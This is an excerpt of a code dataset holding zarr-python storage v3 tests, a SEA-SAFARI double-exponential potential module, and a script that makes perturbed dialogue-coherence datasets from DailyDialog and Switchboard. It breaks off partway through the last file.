store.close()\n\n def test_init_array(self, dimension_separator_fixture_v3):\n\n pass_dim_sep, want_dim_sep = dimension_separator_fixture_v3\n\n store = self.create_store()\n path = \"arr1\"\n transformer = DummyStorageTransfomer(\n \"dummy_type\", test_value=DummyStorageTransfomer.TEST_CONSTANT\n )\n init_array(\n store,\n path=path,\n shape=1000,\n chunks=100,\n dimension_separator=pass_dim_sep,\n storage_transformers=[transformer],\n )\n\n # check metadata\n mkey = meta_root + path + \".array.json\"\n assert mkey in store\n meta = store._metadata_class.decode_array_metadata(store[mkey])\n assert (1000,) == meta[\"shape\"]\n assert (100,) == meta[\"chunk_grid\"][\"chunk_shape\"]\n assert np.dtype(None) == meta[\"data_type\"]\n assert default_compressor == meta[\"compressor\"]\n assert meta[\"fill_value\"] is None\n # Missing MUST be assumed to be \"/\"\n assert meta[\"chunk_grid\"][\"separator\"] is want_dim_sep\n 
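# Editor's note: the attached storage transformer should survive the metadata\n        # encode/decode round trip as a decoded instance, which the asserts below check.\n        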
assert len(meta[\"storage_transformers\"]) == 1\n assert isinstance(meta[\"storage_transformers\"][0], DummyStorageTransfomer)\n assert meta[\"storage_transformers\"][0].test_value == DummyStorageTransfomer.TEST_CONSTANT\n store.close()\n\n def test_list_prefix(self):\n\n store = self.create_store()\n path = \"arr1\"\n init_array(store, path=path, shape=1000, chunks=100)\n\n expected = [meta_root + \"arr1.array.json\", \"zarr.json\"]\n assert sorted(store.list_prefix(\"\")) == expected\n\n expected = [meta_root + \"arr1.array.json\"]\n assert sorted(store.list_prefix(meta_root.rstrip(\"/\"))) == expected\n\n # cannot start prefix with '/'\n with pytest.raises(ValueError):\n store.list_prefix(prefix=\"/\" + meta_root.rstrip(\"/\"))\n\n def test_equal(self):\n store = self.create_store()\n assert store == store\n\n def test_rename_nonexisting(self):\n store = self.create_store()\n if store.is_erasable():\n with pytest.raises(ValueError):\n store.rename(\"a\", \"b\")\n else:\n with pytest.raises(NotImplementedError):\n store.rename(\"a\", \"b\")\n\n def test_get_partial_values(self):\n store = self.create_store()\n store.supports_efficient_get_partial_values in [True, False]\n store[data_root + \"foo\"] = b\"abcdefg\"\n store[data_root + \"baz\"] = b\"z\"\n assert [b\"a\"] == store.get_partial_values([(data_root + \"foo\", (0, 1))])\n assert [\n b\"d\",\n b\"b\",\n b\"z\",\n b\"abc\",\n b\"defg\",\n b\"defg\",\n b\"g\",\n b\"ef\",\n ] == store.get_partial_values(\n [\n (data_root + \"foo\", (3, 1)),\n (data_root + \"foo\", (1, 1)),\n (data_root + \"baz\", (0, 1)),\n (data_root + \"foo\", (0, 3)),\n (data_root + \"foo\", (3, 4)),\n (data_root + \"foo\", (3, None)),\n (data_root + \"foo\", (-1, None)),\n (data_root + \"foo\", (-3, 2)),\n ]\n )\n\n def test_set_partial_values(self):\n store = self.create_store()\n store.supports_efficient_set_partial_values()\n store[data_root + \"foo\"] = b\"abcdefg\"\n store.set_partial_values([(data_root + \"foo\", 0, b\"hey\")])\n assert store[data_root + \"foo\"] == b\"heydefg\"\n\n store.set_partial_values([(data_root + \"baz\", 0, b\"z\")])\n assert store[data_root + \"baz\"] == b\"z\"\n store.set_partial_values(\n [\n (data_root + \"foo\", 1, b\"oo\"),\n (data_root + \"baz\", 1, b\"zzz\"),\n (data_root + \"baz\", 4, b\"aaaa\"),\n (data_root + \"foo\", 6, b\"done\"),\n ]\n )\n assert store[data_root + \"foo\"] == b\"hoodefdone\"\n assert store[data_root + \"baz\"] == b\"zzzzaaaa\"\n store.set_partial_values(\n [\n (data_root + \"foo\", -2, b\"NE\"),\n (data_root + \"baz\", -5, b\"q\"),\n ]\n )\n assert store[data_root + \"foo\"] == b\"hoodefdoNE\"\n assert store[data_root + \"baz\"] == b\"zzzq\"\n\n\nclass TestMappingStoreV3(StoreV3Tests):\n def create_store(self, **kwargs):\n return KVStoreV3(dict())\n\n def test_set_invalid_content(self):\n # Generic mappings support non-buffer types\n pass\n\n\nclass TestMemoryStoreV3(_TestMemoryStore, StoreV3Tests):\n def create_store(self, **kwargs):\n skip_if_nested_chunks(**kwargs)\n return MemoryStoreV3(**kwargs)\n\n\nclass TestDirectoryStoreV3(_TestDirectoryStore, StoreV3Tests):\n def create_store(self, normalize_keys=False, **kwargs):\n # For v3, don't have to skip if nested.\n # skip_if_nested_chunks(**kwargs)\n\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n store = DirectoryStoreV3(path, normalize_keys=normalize_keys, **kwargs)\n return store\n\n def test_rename_nonexisting(self):\n store = self.create_store()\n with pytest.raises(FileNotFoundError):\n store.rename(meta_root + \"a\", 
meta_root + \"b\")\n\n\n@pytest.mark.skipif(have_fsspec is False, reason=\"needs fsspec\")\nclass TestFSStoreV3(_TestFSStore, StoreV3Tests):\n def create_store(self, normalize_keys=False, dimension_separator=\".\", path=None, **kwargs):\n\n if path is None:\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n\n store = FSStoreV3(\n path, normalize_keys=normalize_keys, dimension_separator=dimension_separator, **kwargs\n )\n return store\n\n def test_init_array(self):\n store = self.create_store()\n path = \"arr1\"\n init_array(store, path=path, shape=1000, chunks=100)\n\n # check metadata\n mkey = meta_root + path + \".array.json\"\n assert mkey in store\n meta = store._metadata_class.decode_array_metadata(store[mkey])\n assert (1000,) == meta[\"shape\"]\n assert (100,) == meta[\"chunk_grid\"][\"chunk_shape\"]\n assert np.dtype(None) == meta[\"data_type\"]\n assert meta[\"chunk_grid\"][\"separator\"] == \"/\"\n\n\n@pytest.mark.skipif(have_fsspec is False, reason=\"needs fsspec\")\nclass TestFSStoreV3WithKeySeparator(StoreV3Tests):\n def create_store(self, normalize_keys=False, key_separator=\".\", **kwargs):\n\n # Since the user is passing key_separator, that will take priority.\n skip_if_nested_chunks(**kwargs)\n\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n return FSStoreV3(path, normalize_keys=normalize_keys, key_separator=key_separator)\n\n\n# TODO: enable once N5StoreV3 has been implemented\n# @pytest.mark.skipif(True, reason=\"N5StoreV3 not yet fully implemented\")\n# class TestN5StoreV3(_TestN5Store, TestDirectoryStoreV3, StoreV3Tests):\n\n\nclass TestZipStoreV3(_TestZipStore, StoreV3Tests):\n\n ZipStoreClass = ZipStoreV3\n\n def create_store(self, **kwargs):\n path = mktemp(suffix=\".zip\")\n atexit.register(os.remove, path)\n store = ZipStoreV3(path, mode=\"w\", **kwargs)\n return store\n\n\nclass TestDBMStoreV3(_TestDBMStore, StoreV3Tests):\n def create_store(self, dimension_separator=None):\n path = mktemp(suffix=\".anydbm\")\n atexit.register(atexit_rmglob, path + \"*\")\n # create store using default dbm implementation\n store = DBMStoreV3(path, flag=\"n\", dimension_separator=dimension_separator)\n return store\n\n\nclass TestDBMStoreV3Dumb(_TestDBMStoreDumb, StoreV3Tests):\n def create_store(self, **kwargs):\n path = mktemp(suffix=\".dumbdbm\")\n atexit.register(atexit_rmglob, path + \"*\")\n\n import dbm.dumb as dumbdbm\n\n store = DBMStoreV3(path, flag=\"n\", open=dumbdbm.open, **kwargs)\n return store\n\n\nclass TestDBMStoreV3Gnu(_TestDBMStoreGnu, StoreV3Tests):\n def create_store(self, **kwargs):\n gdbm = pytest.importorskip(\"dbm.gnu\")\n path = mktemp(suffix=\".gdbm\") # pragma: no cover\n atexit.register(os.remove, path) # pragma: no cover\n store = DBMStoreV3(\n path, flag=\"n\", open=gdbm.open, write_lock=False, **kwargs\n ) # pragma: no cover\n return store # pragma: no cover\n\n\nclass TestDBMStoreV3NDBM(_TestDBMStoreNDBM, StoreV3Tests):\n def create_store(self, **kwargs):\n ndbm = pytest.importorskip(\"dbm.ndbm\")\n path = mktemp(suffix=\".ndbm\") # pragma: no cover\n atexit.register(atexit_rmglob, path + \"*\") # pragma: no cover\n store = DBMStoreV3(path, flag=\"n\", open=ndbm.open, **kwargs) # pragma: no cover\n return store # pragma: no cover\n\n\nclass TestDBMStoreV3BerkeleyDB(_TestDBMStoreBerkeleyDB, StoreV3Tests):\n def create_store(self, **kwargs):\n bsddb3 = pytest.importorskip(\"bsddb3\")\n path = mktemp(suffix=\".dbm\")\n atexit.register(os.remove, path)\n store = DBMStoreV3(path, flag=\"n\", open=bsddb3.btopen, 
write_lock=False, **kwargs)\n return store\n\n\nclass TestLMDBStoreV3(_TestLMDBStore, StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"lmdb\")\n path = mktemp(suffix=\".lmdb\")\n atexit.register(atexit_rmtree, path)\n buffers = True\n store = LMDBStoreV3(path, buffers=buffers, **kwargs)\n return store\n\n\nclass TestSQLiteStoreV3(_TestSQLiteStore, StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"sqlite3\")\n path = mktemp(suffix=\".db\")\n atexit.register(atexit_rmtree, path)\n store = SQLiteStoreV3(path, **kwargs)\n return store\n\n\nclass TestSQLiteStoreV3InMemory(_TestSQLiteStoreInMemory, StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"sqlite3\")\n store = SQLiteStoreV3(\":memory:\", **kwargs)\n return store\n\n\n@skip_test_env_var(\"ZARR_TEST_MONGO\")\nclass TestMongoDBStoreV3(StoreV3Tests):\n def create_store(self, **kwargs):\n pytest.importorskip(\"pymongo\")\n store = MongoDBStoreV3(\n host=\"127.0.0.1\", database=\"zarr_tests\", collection=\"zarr_tests\", **kwargs\n )\n # start with an empty store\n store.clear()\n return store\n\n\n@skip_test_env_var(\"ZARR_TEST_REDIS\")\nclass TestRedisStoreV3(StoreV3Tests):\n def create_store(self, **kwargs):\n # TODO: this is the default host for Redis on Travis,\n # we probably want to generalize this though\n pytest.importorskip(\"redis\")\n store = RedisStoreV3(host=\"localhost\", port=6379, **kwargs)\n # start with an empty store\n store.clear()\n return store\n\n\n@pytest.mark.skipif(not v3_sharding_available, reason=\"sharding is disabled\")\nclass TestStorageTransformerV3(TestMappingStoreV3):\n def create_store(self, **kwargs):\n inner_store = super().create_store(**kwargs)\n dummy_transformer = DummyStorageTransfomer(\n \"dummy_type\", test_value=DummyStorageTransfomer.TEST_CONSTANT\n )\n sharding_transformer = ShardingStorageTransformer(\n \"indexed\",\n chunks_per_shard=2,\n )\n path = \"bla\"\n init_array(\n inner_store,\n path=path,\n shape=1000,\n chunks=100,\n dimension_separator=\".\",\n storage_transformers=[dummy_transformer, sharding_transformer],\n )\n store = Array(store=inner_store, path=path).chunk_store\n store.erase_prefix(\"data/root/bla/\")\n store.clear()\n return store\n\n def test_method_forwarding(self):\n store = self.create_store()\n inner_store = store.inner_store.inner_store\n assert store.list() == inner_store.list()\n assert store.list_dir(data_root) == inner_store.list_dir(data_root)\n\n assert store.is_readable()\n assert store.is_writeable()\n assert store.is_listable()\n inner_store._readable = False\n inner_store._writeable = False\n inner_store._listable = False\n assert not store.is_readable()\n assert not store.is_writeable()\n assert not store.is_listable()\n\n\nclass TestLRUStoreCacheV3(_TestLRUStoreCache, StoreV3Tests):\n\n CountingClass = CountingDictV3\n LRUStoreClass = LRUStoreCacheV3\n\n\n@skip_test_env_var(\"ZARR_TEST_ABS\")\nclass TestABSStoreV3(_TestABSStore, StoreV3Tests):\n\n ABSStoreClass = ABSStoreV3\n\n\ndef test_normalize_store_arg_v3(tmpdir):\n\n fn = tmpdir.join(\"store.zip\")\n store = normalize_store_arg(str(fn), zarr_version=3, mode=\"w\")\n assert isinstance(store, ZipStoreV3)\n assert \"zarr.json\" in store\n\n # can't pass storage_options to non-fsspec store\n with pytest.raises(ValueError):\n normalize_store_arg(str(fn), zarr_version=3, mode=\"w\", storage_options={\"some\": \"kwargs\"})\n\n if have_fsspec:\n import fsspec\n\n path = tempfile.mkdtemp()\n store = normalize_store_arg(\"file://\" + 
path, zarr_version=3, mode=\"w\")\n assert isinstance(store, FSStoreV3)\n assert \"zarr.json\" in store\n\n store = normalize_store_arg(fsspec.get_mapper(\"file://\" + path), zarr_version=3)\n assert isinstance(store, FSStoreV3)\n\n # regression for https://github.com/zarr-developers/zarr-python/issues/1382\n # contents of zarr.json are not important for this test\n out = {\"version\": 1, \"refs\": {\"zarr.json\": \"{...}\"}}\n store = normalize_store_arg(\n \"reference://\", storage_options={\"fo\": out, \"remote_protocol\": \"memory\"}, zarr_version=3\n )\n assert isinstance(store, FSStoreV3)\n\n fn = tmpdir.join(\"store.n5\")\n with pytest.raises(NotImplementedError):\n normalize_store_arg(str(fn), zarr_version=3, mode=\"w\")\n\n # error on zarr_version=3 with a v2 store\n with pytest.raises(ValueError):\n normalize_store_arg(KVStore(dict()), zarr_version=3, mode=\"w\")\n\n # error on zarr_version=2 with a v3 store\n with pytest.raises(ValueError):\n normalize_store_arg(KVStoreV3(dict()), zarr_version=2, mode=\"w\")\n\n\nclass TestConsolidatedMetadataStoreV3(_TestConsolidatedMetadataStore):\n\n version = 3\n ConsolidatedMetadataClass = ConsolidatedMetadataStoreV3\n\n @property\n def metadata_key(self):\n return meta_root + \"consolidated/.zmetadata\"\n\n def test_bad_store_version(self):\n with pytest.raises(ValueError):\n self.ConsolidatedMetadataClass(KVStore(dict()))\n\n\ndef test_get_hierarchy_metadata():\n store = KVStoreV3({})\n\n # error raised if 'jarr.json' is not in the store\n with pytest.raises(ValueError):\n _get_hierarchy_metadata(store)\n\n store[\"zarr.json\"] = _default_entry_point_metadata_v3\n assert _get_hierarchy_metadata(store) == _default_entry_point_metadata_v3\n\n # ValueError if only a subset of keys are present\n store[\"zarr.json\"] = {\"zarr_format\": \"https://purl.org/zarr/spec/protocol/core/3.0\"}\n with pytest.raises(ValueError):\n _get_hierarchy_metadata(store)\n\n # ValueError if any unexpected keys are present\n extra_metadata = copy.copy(_default_entry_point_metadata_v3)\n extra_metadata[\"extra_key\"] = \"value\"\n store[\"zarr.json\"] = extra_metadata\n with pytest.raises(ValueError):\n _get_hierarchy_metadata(store)\n\n\ndef test_top_level_imports():\n for store_name in [\n \"ABSStoreV3\",\n \"DBMStoreV3\",\n \"KVStoreV3\",\n \"DirectoryStoreV3\",\n \"LMDBStoreV3\",\n \"LRUStoreCacheV3\",\n \"MemoryStoreV3\",\n \"MongoDBStoreV3\",\n \"RedisStoreV3\",\n \"SQLiteStoreV3\",\n \"ZipStoreV3\",\n ]:\n if v3_api_available:\n assert hasattr(zarr, store_name) # pragma: no cover\n else:\n assert not hasattr(zarr, store_name) # pragma: no cover\n\n\ndef _get_public_and_dunder_methods(some_class):\n return set(\n name\n for name, _ in inspect.getmembers(some_class, predicate=inspect.isfunction)\n if not name.startswith(\"_\") or name.startswith(\"__\")\n )\n\n\ndef test_storage_transformer_interface():\n store_v3_methods = _get_public_and_dunder_methods(StoreV3)\n store_v3_methods.discard(\"__init__\")\n # Note, getitems() isn't mandatory when get_partial_values() is available\n store_v3_methods.discard(\"getitems\")\n storage_transformer_methods = _get_public_and_dunder_methods(StorageTransformer)\n storage_transformer_methods.discard(\"__init__\")\n storage_transformer_methods.discard(\"get_config\")\n assert storage_transformer_methods == 
store_v3_methods\n","repo_name":"zarr-developers/zarr-python","sub_path":"zarr/tests/test_storage_v3.py","file_name":"test_storage_v3.py","file_ext":"py","file_size_in_byte":23175,"program_lang":"python","lang":"en","doc_type":"code","stars":1249,"dataset":"github-code","pt":"82"} +{"seq_id":"19594605011","text":"#!/usr/bin/env python3\n\nfrom mendeleev import element # For looking up atomic numbers, etc\nimport numpy as np\n\nfrom base_pot import PotProvider\n\n# This is a map of pairs to parameters\n# Parameters for the standard SAFARI Double exponential\nDE_Params = {}\n\n# Here are some example parameters\nDE_Params['Au-Au'] = [44.691, 1.164, 40987.591, 4.537]\nDE_Params['Na-Au'] = [4153.6, 3.625, 27017.57, 7.286]\nDE_Params['Na-Cu'] = [2051.73, 3.753, 11163.2, 6.877]\n\nclass DE(PotProvider):\n\n def V_r(self, A, B, r):\n pair = A+'-'+B\n if not pair in DE_Params:\n pair = B+'-'+A\n if not pair in DE_Params:\n print(\"Unknown Pair {}\".format(pair))\n exit()\n params = DE_Params[pair]\n a = params[0]\n b = params[1]\n c = params[2]\n d = params[3]\n return a * np.exp(-b * r) + c * np.exp(-d * r)\n\n def dV_dr(self, A, B, r):\n pair = A+'-'+B\n if not pair in DE_Params:\n pair = B+'-'+A\n if not pair in DE_Params:\n print(\"Unknown Pair {}\".format(pair))\n exit()\n params = DE_Params[pair]\n a = params[0]\n b = params[1]\n c = params[2]\n d = params[3]\n return b * a * np.exp(-b * r) + d * c * np.exp(-d * r)\n\n def name(self):\n return \"Double Exponential\"\n\n def abbrv(self):\n return \"DE\"","repo_name":"SINS-Lab/SEA-SAFARI","sub_path":"utility_scripts/potential_generation/DE.py","file_name":"DE.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"86584084312","text":"import math\nimport os\nfrom copy import deepcopy\nfrom ast import literal_eval\nimport pandas as pd\nfrom math import factorial\nimport random\nfrom collections import Counter, defaultdict\nimport sys\nfrom nltk import word_tokenize\nfrom tqdm import tqdm, trange\nimport argparse\nimport numpy as np\nimport re\nimport csv\nfrom sklearn.model_selection import train_test_split\n\nfrom swda.swda import CorpusReader, Transcript, Utterance\n\nact2word = {1:\"inform\",2:\"question\", 3:\"directive\", 4:\"commissive\"}\n\ndef permute(sents, sent_DAs, amount):\n \"\"\" return a list of different! permuted sentences and their respective dialog acts \"\"\"\n \"\"\" if amount is greater than the possible amount of permutations, only the uniquely possible ones are returned \"\"\"\n assert len(sents) == len(sent_DAs), \"length of permuted sentences and list of DAs must be equal\"\n\n if amount == 0:\n return []\n\n permutations = [list(range(len(sents)))]\n amount = min(amount, factorial(len(sents))-1)\n for i in range(amount):\n permutation = np.random.permutation(len(sents))\n while permutation.tolist() in permutations:\n permutation = np.random.permutation(len(sents))\n\n permutations.append(permutation.tolist())\n return permutations[1:] #the first one is the original, which was included s.t. 
won't be generated\n\ndef draw_rand_sent(act_utt_df, sent_len, amount):\n \"\"\" df is supposed to be a pandas dataframe with colums 'act' and 'utt' (utterance), \n with act being a number from 1 to 4 and utt being a sentence \"\"\"\n\n permutations = []\n for _ in range(amount):\n (utt, da, name, ix) = draw_rand_sent_from_df(act_utt_df)\n sent_insert_ix = random.randint(0, sent_len-1)\n permutations.append((utt, da, name, ix, sent_insert_ix))\n return permutations\n\ndef draw_rand_sent_from_df(df):\n ix = random.randint(0, len(df['utt'])-1)\n return literal_eval(df['utt'][ix]), df['act'][ix], df['dialogue'][ix], df['ix'][ix]\n\ndef half_perturb(sents, sent_DAs, amount):\n assert len(sents) == len(sent_DAs), \"length of permuted sentences and list of DAs must be equal\"\n\n permutations = [list(range(len(sents)))]\n\n for _ in range(amount):\n while True:\n speaker = random.randint(0,1) # choose one of the speakers\n speaker_ix = list(filter(lambda x: (x-speaker) % 2 == 0, range(len(sents))))\n\n permuted_speaker_ix = np.random.permutation(speaker_ix)\n new_sents = list(range(len(sents)))\n for (i_to, i_from) in zip(speaker_ix, permuted_speaker_ix):\n new_sents[i_to] = i_from\n\n if (not new_sents == permutations[0]) and (\n not new_sents in permutations or len(permutations) > math.factorial(len(speaker_ix))):\n permutations.append(new_sents)\n break\n\n return permutations[1:]\n\ndef utterance_insertions(length, amount):\n possible_permutations = []\n original = list(range(length))\n for ix in original:\n for y in range(length):\n if ix == y: continue\n\n ix_removed = original[0:ix] + ([] if ix == length-1 else original[ix+1:])\n ix_removed.insert(y, ix)\n possible_permutations.append(deepcopy(ix_removed))\n\n permutations = []\n for _ in range(amount):\n i = random.randint(0, len(possible_permutations)-1)\n permutations.append(possible_permutations[i])\n\n return permutations\n\nclass DailyDialogConverter:\n def __init__(self, data_dir, tokenizer, word2id, task='', ranking_dataset = True):\n self.data_dir = data_dir\n self.act_utt_file = os.path.join(data_dir, 'act_utt_name.txt')\n\n self.tokenizer = tokenizer\n self.word2id = word2id\n self.output_file = None\n self.task = task\n self.ranking_dataset = ranking_dataset\n self.perturbation_statistics = 0\n\n self.setname = os.path.split(data_dir)[1]\n assert self.setname == 'train' or self.setname == 'validation' or self.setname == 'test', \"wrong data dir name\"\n\n def create_act_utt(self):\n dial_file = os.path.join(self.data_dir, \"dialogues_{}.txt\".format(self.setname))\n act_file = os.path.join(self.data_dir, \"dialogues_act_{}.txt\".format(self.setname))\n output_file = os.path.join(self.data_dir, 'act_utt_name.txt'.format(self.task))\n\n df = open(dial_file, 'r')\n af = open(act_file, 'r')\n of = open(output_file, 'w')\n csv_writer = csv.writer(of, delimiter='|')\n\n for line_count, (dial, act) in tqdm(enumerate(zip(df, af)), total=11118):\n seqs = dial.split('__eou__')\n seqs = seqs[:-1]\n\n if len(seqs) < 5:\n continue\n\n tok_seqs = [self.tokenizer(seq) for seq in seqs]\n tok_seqs = [[w.lower() for w in utt] for utt in tok_seqs]\n tok_seqs = [self.word2id(seq) for seq in tok_seqs]\n\n acts = act.split(' ')\n acts = acts[:-1]\n acts = [int(act) for act in acts]\n\n for utt_i, (act, utt) in enumerate(zip(acts, tok_seqs)):\n dialog_name = \"{}_{}\".format(self.setname, line_count)\n row = (act, utt, dialog_name,utt_i)\n csv_writer.writerow(row)\n\n def convert_dset(self, amounts):\n # data_dir is supposed to be the dir with the 
respective train/test/val-dataset files\n print(\"Creating {} perturbations for task {}\".format(amounts, self.task))\n\n dial_file = os.path.join(self.data_dir, \"dialogues_{}.txt\".format(self.setname))\n act_file = os.path.join(self.data_dir, \"dialogues_act_{}.txt\".format(self.setname))\n self.output_file = os.path.join(self.data_dir, 'coherency_dset_{}.txt'.format(self.task))\n\n root_data_dir = os.path.split(self.data_dir)[0]\n shuffled_path = os.path.join(root_data_dir, \"shuffled_{}\".format(self.task))\n if not os.path.isdir(shuffled_path):\n os.mkdir(shuffled_path)\n\n assert os.path.isfile(dial_file) and os.path.isfile(act_file), \"could not find input files\"\n assert os.path.isfile(self.act_utt_file), \"missing act_utt.txt in data_dir\"\n\n with open(self.act_utt_file, 'r') as f:\n act_utt_df = pd.read_csv(f, sep='|', names=['act','utt','dialogue','ix'])\n\n rand_generator = lambda: draw_rand_sent_from_df(act_utt_df)\n\n df = open(dial_file, 'r')\n af = open(act_file, 'r')\n of = open(self.output_file, 'w')\n\n discarded = 0\n\n for line_count, (dial, act) in tqdm(enumerate(zip(df, af)), total=11118):\n seqs = dial.split('__eou__')\n seqs = seqs[:-1]\n\n if len(seqs) < 5:\n discarded += 1\n continue\n\n tok_seqs = [self.tokenizer(seq) for seq in seqs]\n tok_seqs = [[w.lower() for w in utt] for utt in tok_seqs]\n tok_seqs = [self.word2id(seq) for seq in tok_seqs]\n\n acts = act.split(' ')\n acts = acts[:-1]\n acts = [int(act) for act in acts]\n\n if self.task == 'up':\n permuted_ixs = permute(tok_seqs, acts, amounts)\n elif self.task == 'us':\n permuted_ixs = draw_rand_sent(act_utt_df, len(tok_seqs), amounts)\n elif self.task == 'hup':\n permuted_ixs = half_perturb(tok_seqs, acts, amounts)\n elif self.task == 'ui':\n permuted_ixs = utterance_insertions(len(tok_seqs), amounts)\n\n shuffle_file = os.path.join(shuffled_path, \"{}_{}.csv\".format(self.setname, line_count))\n with open(shuffle_file, \"w\") as f:\n csv_writer = csv.writer(f)\n for perm in permuted_ixs:\n if self.task == 'us':\n (utt, da, name, ix, insert_ix) = perm\n row = [name, ix,insert_ix]\n csv_writer.writerow(row)\n else:\n csv_writer.writerow(perm)\n\n self.perturbation_statistics += len(permuted_ixs)\n\n if self.task == 'us':\n for p in permuted_ixs:\n (insert_sent, insert_da, name, ix, insert_ix) = p\n a = \" \".join([str(a) for a in acts])\n u = str(tok_seqs)\n p_a = deepcopy(acts)\n p_a[insert_ix] = insert_da\n pa = \" \".join([str(a) for a in p_a])\n p_u = deepcopy(tok_seqs)\n p_u[insert_ix] = self.word2id(insert_sent)\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,pa,p_u))\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",pa,p_u,a,u))\n\n else:\n for p in permuted_ixs:\n a = \" \".join([str(a) for a in acts])\n u = str(tok_seqs)\n pa = [acts[i] for i in p]\n p_a = \" \".join([str(a) for a in pa])\n pu = [tok_seqs[i] for i in p]\n p_u = str(pu)\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"0\",a,u,p_a,p_u))\n of.write(\"{}|{}|{}|{}|{}\\n\".format(\"1\",p_a,p_u,a,u))\n\n print(discarded)\n\nclass SwitchboardConverter:\n def __init__(self, data_dir, tokenizer, word2id, task='', seed=42):\n self.corpus = CorpusReader(data_dir)\n self.data_dir = data_dir\n self.tokenizer = tokenizer\n self.word2id = word2id\n self.task = task\n\n self.utt_num = 0\n for utt in self.corpus.iter_utterances():\n self.utt_num += 1\n\n self.trans_num = 0\n for trans in self.corpus.iter_transcripts():\n self.trans_num += 1\n\n self.da2num = switchboard_da_mapping()\n \n # CAUTION: make sure that for each task the seed is the same s.t. 
train_ixs, val_ixs = train_test_split(range(self.trans_num), shuffle=True, train_size=0.8, random_state=seed)\n        val_ixs, test_ixs = train_test_split(val_ixs, shuffle=True, train_size=0.5, random_state=seed)\n        self.train_ixs, self.val_ixs, self.test_ixs = train_ixs, val_ixs, test_ixs\n\n        self.utt_da_pairs = []\n        prev_da = \"%\"\n        for i, utt in enumerate(self.corpus.iter_utterances()):\n            sentence = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\",\n                    utt.text)\n\n            sentence = self.word2id(self.tokenizer(sentence))\n            act = utt.damsl_act_tag()\n            if act is None: act = \"%\"\n            if act == \"+\": act = prev_da\n            prev_da = act  # remember the last tag so \"+\" continuations can inherit it\n\n            _, swda_name = os.path.split(utt.swda_filename)\n            swda_name = swda_name[:-4] if swda_name.endswith('.csv') else swda_name\n\n            ix = utt.utterance_index\n\n            self.utt_da_pairs.append((sentence, act, swda_name, ix))\n\n    def draw_rand_sent(self):\n        r = random.randint(0, len(self.utt_da_pairs)-1)\n        return self.utt_da_pairs[r]\n\n    def create_vocab(self):\n        print(\"Creating Vocab file for Switchboard\")\n\n        cnt = Counter()\n        for utt in self.corpus.iter_utterances():\n            sentence = re.sub(r\"([+/\\}\\[\\]]|\\{\\w)\", \"\",\n                    utt.text)\n            sentence = self.tokenizer(sentence)\n            for w in sentence:\n                cnt[w] += 1\n\n        itos_file = os.path.join(self.data_dir, \"itos.txt\")\n        itosf = open(itos_file, \"w\")\n\n        for (word, _) in cnt.most_common(25000):\n            itosf.write(\"{}\\n\".format(word))\n\n\n    #getKeysByValue\n    def swda_permute(self, sents, amount, speaker_ixs):\n        if amount == 0:\n            return []\n\n        permutations = [list(range(len(sents)))]\n        segment_permutations = []\n        amount = min(amount, factorial(len(sents))-1)\n        segm_ixs = self.speaker_segment_ixs(speaker_ixs)\n        segments = list(set(segm_ixs.values()))\n\n        for i in range(amount):\n            while True:\n                permutation = []\n                segm_perm = np.random.permutation(len(segments))\n                for segm_ix in segm_perm:\n                    utt_ixs = sorted(getKeysByValue(segm_ixs, segm_ix))\n                    permutation = permutation + utt_ixs\n\n                if permutation not in permutations:\n                    break\n\n            # record the segment permutation only once it has been accepted,\n            # so it stays in sync with the permutations list\n            segment_permutations.append(segm_perm)\n            permutations.append(permutation)\n        return permutations[1:], segment_permutations #the first one is the original, which was included s.t. it 
won't be generated\n\n    def speaker_segment_ixs(self, speaker_ixs):\n        i = 0\n        segment_indices = dict()\n        prev_speaker = speaker_ixs[0]\n        for j, speaker in enumerate(speaker_ixs):\n            if speaker != prev_speaker:\n                prev_speaker = speaker\n                i += 1\n            segment_indices[j] = i\n        return segment_indices\n\n    def swda_half_perturb(self, amount, speaker_ixs):\n        segm_ixs = self.speaker_segment_ixs(speaker_ixs)\n        segments = list(set(segm_ixs.values()))\n        segment_permutations = []\n        permutations = [list(segm_ixs.keys())]\n        for _ in range(amount):\n            speaker = random.randint(0,1) # choose one of the speakers\n            speaker_to_perm = list(filter(lambda x: (x-speaker) % 2 == 0, segments))\n            speaker_orig = list(filter(lambda x: (x-speaker) % 2 != 0, segments))\n            #TODO: rename either speaker_ix or speaker_ixs, they are something different, but the names are too close\n            if len(speaker_to_perm) < 2:\n                return []\n\n            while True:\n                permuted_speaker_ix = np.random.permutation(speaker_to_perm).tolist()\n\n                new_segments = [None]*(len(speaker_orig)+len(permuted_speaker_ix))\n                if speaker == 0:\n                    new_segments[::2] = permuted_speaker_ix\n                    new_segments[1::2] = speaker_orig\n                else:\n                    new_segments[1::2] = permuted_speaker_ix\n                    new_segments[::2] = speaker_orig\n\n                permutation = []\n                for segm_ix in new_segments:\n                    utt_ixs = sorted(getKeysByValue(segm_ixs, segm_ix))\n                    permutation = permutation + utt_ixs\n\n                if permutation not in permutations:\n                    # record the segment permutation only once it has been accepted\n                    segment_permutations.append(new_segments)\n                    permutations.append(permutation)\n                    break\n\n        return permutations[1:], segment_permutations\n\n    def swda_utterance_insertion(self, speaker_ixs, amounts):\n        segment_ixs = self.speaker_segment_ixs(speaker_ixs)\n        segments = list(set(segment_ixs.values()))\n        segment_permutations = []\n        permutations = []\n\n        for _ in range(amounts):\n            while True: # actually: do ... while permutation not in permutations\n                i_from = random.randint(0, len(segments)-1)\n                i_to = random.randint(0, len(segments)-2)\n                segm_perm = deepcopy(segments)\n                rem_elem = segments[i_from]\n                segm_perm = segm_perm[0:i_from] + segm_perm[i_from+1:]\n                segm_perm = segm_perm[0:i_to] + [rem_elem] + segm_perm[i_to:]\n\n                permutation = []\n                for segm_ix in segm_perm:\n                    utt_ixs = sorted(getKeysByValue(segment_ixs, segm_ix))\n                    permutation = permutation + utt_ixs\n\n                if permutation not in permutations:\n                    permutations.append(permutation)\n                    segment_permutations.append(segm_perm)\n                    break\n\n        